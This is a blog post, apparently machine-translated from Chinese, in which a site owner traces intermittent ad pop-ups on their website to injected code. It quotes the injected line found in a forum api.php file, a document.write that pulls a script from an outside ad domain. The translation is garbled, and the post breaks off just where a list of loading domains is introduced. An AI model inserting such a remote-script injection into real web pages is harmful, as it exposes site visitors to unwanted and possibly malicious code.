last December, some friends reminded me to open my website and pop up. Because before the station has home page files have been inserted malicious code occurred, so I deliberately open the site, carefully look at the source code, whether there is suspicious code, but no fruit. I asked my friends if they played it every time. My friend said, "not every time, but occasionally," and then I came to the conclusion that the DNS hijacked ads by telecom operators. Shortly after, in Beijing, the team partner Peng Peng asked me why I open the home page, sometimes there will be game advertising pop-up, this time I’m sure the site will be put malicious code. Again carefully look at the page source, finally found the traces, malicious code does exist, but not in the web page file, but on a call for data PHP file "two level domain forum under the api.php", the author write malicious code:
document.write ("< scriptsrc=http://s.ad.nu99.com/ip.asp; loc=zibo> < /script>;)";
then this file is loaded when it is called to the main station, and the latter Zibo is exactly why I never found the pop-up of an ad page in Zibo.
go to Beijing in May to attend Entrepreneurs Conference, in a hotel room in the web site and found the advertising page pops up, quickly look at the open source did not find any abnormality, thought must find time to carefully find the problem, but the back forget it.
last week to a friend there to play, to show him my website, suddenly found the pop-up ads, this time I am sure the site is inserted into the malicious code, must carefully look for reasons, this week is too busy and almost forgot this thing, today the site access speed is particularly slow, often appear morning do not open the phenomenon, for safety reasons, made a temporary data backup. After the data backup, the customer service QQ message in the computer room said the website speed was slow, but there was no reply. The afternoon of the site open speed is slightly better but still significantly slow loading process also need to open the web page, just a few seconds to load this page I noticed a domain name ad.df77.com in the browser status bar, the domain name looked too familiar, treated with ad.nu99.com before the same. This time I can’t run this malicious code again, I must pull it out.
process, so the script code section one check, and finally failed to find. The thought of chromium core browser capture tools, open capture tools, refresh the page source in the following list clearly lists the data sources of each domain name page loading: